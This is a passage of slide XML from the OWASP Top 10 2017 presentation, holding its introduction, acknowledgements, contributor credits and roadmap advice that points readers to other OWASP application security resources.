              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> if a true standard is required, but for most, the OWASP Top 10 is a great start on the application security journey.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>We have written up a range of suggested next steps for different users of the OWASP Top 10, including "What's next for developers", "What's next for testers", "What's next for organizations" which is suitable for CIO's and CISO's, "What's next for application managers", which is suitable for application owners.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes. Leverage your organization's existing strengths to do and measure what works for you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your questions, comments, and ideas at our GitHub project repository:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/OWASP/Top10/issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121920"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You can find OWASP Top 10 project and translations here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/top10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270"/>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Lastly, we wish to thank the founding leadership of the OWASP Top 10 project, Dave Wichers and Jeff Williams for all their efforts, and believing in us to get this finished with the community's help. Thank you!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="121920"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Torsten Gigler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Brian Glas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Neil Smithline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Andrew van der Stock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872923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2392320109"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3810000"/>
          <a:ext cx="3352800" cy="5333999"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="340139">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0"/>
                        <a:t>Roadmap for future activities</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>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49938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700" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Don't stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. The OWASP Top 10 will continue to change. Even without changing a single line of your application's code, you may become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in “What's Next For Developers, Testers, and Organizations” for more information.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>When you're ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP is maintaining and promoting the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> as a guide to organizations and application reviewers on what to verify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Security vulnerabilities can be quite complex and deeply buried in code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Focus on making security an integral part of your culture throughout your development organization. Find out more in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Aria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923179548"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3810001"/>
          <a:ext cx="3429000" cy="5334004"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335276">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>Attribution</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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49987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700" kern="1200" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>We'd like to thank the organizations that contributed their vulnerability data to support the 2017 update. We received more than 40 responses to the call for data. For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available. We believe this is one of the larger, more diverse collections of vulnerability data yet collected publicly. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>As there are more contributors than space here, we have created a dedicated page to recognize the contributions made. We wish to give heartfelt thanks to these organizations for being willing to be on the front lines of publicly sharing vulnerability data from their efforts. We hope this will continue to grow and encourage more organizations to do the same and possibly be seen as one of the key milestones of evidence based security. The OWASP Top 10 would not be possible without these amazing contributions. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A big thank you to the 516 individuals who took the time to complete the industry ranked survey. Your voice helped determine two new additions to the Top 10. The additional comments, notes of encouragement (and criticisms), were all appreciated. We know your time is valuable and we wanted to say thanks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>We would like to thank in advance those individuals who contribute significant constructive comments and time reviewing this update to the Top 10. As much as possible, we have listed them on the attribution page ‘+Ack’. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>And finally, we'd like to thank in advance all the translators out there that will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.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 Placeholder 10"/>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dirty="0"/>
              <a:t>I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{006EF41C-22F0-4CD0-98DC-529189A47945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2083310678"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="27432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281598">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Welcome</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> to the OWASP Top 10 2017! </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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2407920">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>This major update adds several new issues, including two issues selected by the community - A8:2017-Insecure Deserialization and A10:2017-Insufficient logging and monitoring. Community feedback drove the collection of the most amount of data ever assembled in the preparation of an application security standard, and so we are confident that the remaining 8 issues are the most important for organizations to address, particularly the A3:2017-Exposure of Sensitive Data in the age of the EU's General Data Protection Regulation, A6:2017-Security Misconfiguration especially around cloud and API services, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A9:2017 Using Components with Known Vulnerabilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>, which can be especially challenging for those on modern platforms, like node.js. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The OWASP Top 10 for 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> completed by 515 individuals</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. This data spans vulnerabilities gathered from hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Aria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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBC665-1B35-4A1D-B9C5-F23A146454B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3008682429"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="804672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81000">
                <a:tc>
